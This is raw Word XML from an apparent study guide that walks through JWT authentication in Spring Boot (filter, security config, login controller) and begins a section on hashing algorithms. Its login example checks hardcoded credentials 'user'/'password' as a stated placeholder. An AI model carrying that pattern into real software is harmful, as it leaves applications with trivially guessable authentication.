      </w:pPr>
    </w:p>
    <w:p w14:paraId="77113942"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JwtFilter extends OncePerRequestFilter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE9AFA" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131C485B"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JwtUtil jwtUtil;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F109550" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A3CF820"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JwtFilter(JwtUtil jwtUtil) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1007CA35"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jwtUtil = jwtUtil;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E4F9FF"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0C575B98" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E61934A"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505C32C8"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otected void doFilterInternal(HttpServletRequest request, HttpServletResponse response, FilterChain filterChain) throws ServletException, IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1505A2"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token = request.getHeader("Authorization");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D861608" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C080640"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token != null &amp;&amp; token.startsWith("Bearer ")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE49AD1"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oken = token.substring(7); // Remove "Bearer " prefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F142E66"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ring username = jwtUtil.extractUsername(token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0444DD2B" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E5737D"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username != null &amp;&amp; SecurityContextHolder.getContext().getAuthentication() == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8C7D71"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jwtUtil.validateToken(token, username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B53BA1"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Create an authentication object and set it in the context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BD78B0"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UsernamePasswordAuthenticationToken authentication = new UsernamePasswordAuthenticationToken(username, null, new ArrayList&lt;&gt;());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCBD2AE"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ecurityContextHolder.getContext().setAuthentication(authentication);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195E0F6A"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88223CF"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43A48EEC"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1B0BBB98"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ilterChain.doFilter(request, response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C28711D"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6883689"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2A0E6CE" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">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Security Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C36028"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this class, you configure Spring Security to use the JWT filter for every request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4C808D"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org.springframework.context.annotation.Bean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EC6688"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org.springframework.context.annotation.Configuration;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2660ED"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org.springframework.security.authentication.AuthenticationManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57611EC4"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org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E627A9"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import org.springframework.security.config.annotation.web.builders.HttpSecurity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8C4BCB"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org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74449CEF"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org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07457623" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED1D331"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figuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229FB44D"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ableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D4BBF9"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SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733C1CAA" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6424A476"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JwtUtil jwtUtil;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC622B3" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082E1315"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ecurityConfig(JwtUtil jwtUtil) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9ECF63"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this.jwtUtil = jwtUtil;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69870319"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B8EB2C4" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6CFD7E"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6C45A103"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otected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463EF2EA"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http.csrf().disable()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F9DA8A"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uthorizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4741D0AD"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ntMatchers("/login").permitAll()  // Public endpoint for login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EF5018"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nyRequest().authenticated()     // All other endpoints need authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E07AFD"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nd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDB26AF"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ddFilter(new JwtFilter(jwtUtil)); // Add JWT filter for every request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167DB45"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853BBC8" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F57E011"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293BC21F"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7492DFD9"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AuthenticationManager authenticationManagerBean() throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A277B3"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super.authenticationManagerBean();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D6EF36"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20A3B4A6"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3560977" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">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Authentication Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5E6CE"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reate an endpoint where users can log in, and a JWT token is generated upon successful authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B645F1B"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org.springframework.beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A1425B"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org.springframework.web.bind.annotation.RequestMapping;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697B9C0F"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org.springframework.web.bind.annotation.RequestMethod;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461EE728"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ort org.springframework.web.bind.annotation.RestController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A96BF1A" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742E0C8D"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A481B3"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class AuthenticationController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331068E6" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1795143A"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D35B249"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vate JwtUtil jwtUtil;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200583B9" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E9B0496"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questMapping(value = "/login", method = RequestMethod.POST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BA0B1"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ublic String createJwtToken(String username, String password) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15209AF8"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 Validate user credentials (you can integrate with a user service here)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE5C887"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f (username.equals("user") &amp;&amp; password.equals("password")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704AB1DD"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jwtUtil.generateToken(username);  // Generate and return JWT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C966EC8"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224E678"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return "Invalid credentials";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA4E27"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3C850FBA"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7B91914" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">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Accessing Protected Resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7303EB2E"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w, when accessing any protected endpoint, users need to provide the Authorization header with the JWT token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78623885"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1F4D69"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GET /protected-resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE9A22B" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">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uthorization: Bearer &lt;JWT_TOKEN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFF0A2F" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">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7. Testing the JWT Authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5636A09D" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1967"/>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rst, call the /login endpoint with valid credentials to get the JWT token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BC8453" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1967"/>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n, use this token to make requests to protected endpoints, by including the Authorization header with the token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432D1D19" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">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dvantages of JWT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C223B8" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1968"/>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teless</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server does not need to store session information. The token contains all the information needed for authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E1294E" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1968"/>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pact</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JWT is compact and can be easily transmitted in URLs, HTTP headers, or cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FA588C" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1968"/>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cure</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JWTs are signed, ensuring the integrity of the data and preventing tampering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D23CA13" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1968"/>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calable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since the server does not need to store session state, JWT is highly scalable and ideal for distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410C253A" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pP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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FCF23F" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1969"/>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WT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a compact, URL-safe token format used for secure information exchange, commonly used in authentication mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E61C00" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1969"/>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pring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> simplifies the integration of JWT by using spring-boot-starter-security and a custom filter that checks for JWT tokens in requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CCFFEB" w14:textId="77777777" w:rsidR="0049244F" w:rsidRPr="00CE4B95" w:rsidRDefault="0049244F" w:rsidP="0049244F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1969"/>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flow involves generating a JWT upon user authentication, validating it on subsequent requests, and securing endpoints using Spring Security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750BE06D" w14:textId="30989E35" w:rsidR="006F4985" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006F4985">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346F25">
          <v:rect id="_x0000_i2160" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F4C9F0" w14:textId="467C4FFC" w:rsidR="006F4985" w:rsidRPr="00CE4B95" w:rsidRDefault="006F4985" w:rsidP="006F4985">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="476" w:name="_Toc196307956"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain a few </w:t>
      </w:r>
      <w:r w:rsidR="005A0D79" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ecurity </w:t>
      </w:r>
      <w:r w:rsidR="005A0D79" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>lgorithms?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="476"/>
    </w:p>
    <w:p w14:paraId="3E3E70CF" w14:textId="40E94F85" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Here are a few commonly used </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>security algorithms</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in software development and cybersecurity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7A81B3" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="00000000" w:rsidP="00B1664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630DE07">
          <v:rect id="_x0000_i2161" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CE9B54" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Hashing Algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B299D30" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Used to generate fixed-size output (hash) from variable-size input (e.g., passwords, messages). </w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>One-way</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – can't retrieve original data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168012B5" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16649">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 128-bit hash, now considered broken/insecure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A732F" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="00B16649" w:rsidRDefault="006F4985" w:rsidP="00B16649">
      <w:pPr>
        <w:jc w:val="both"/>
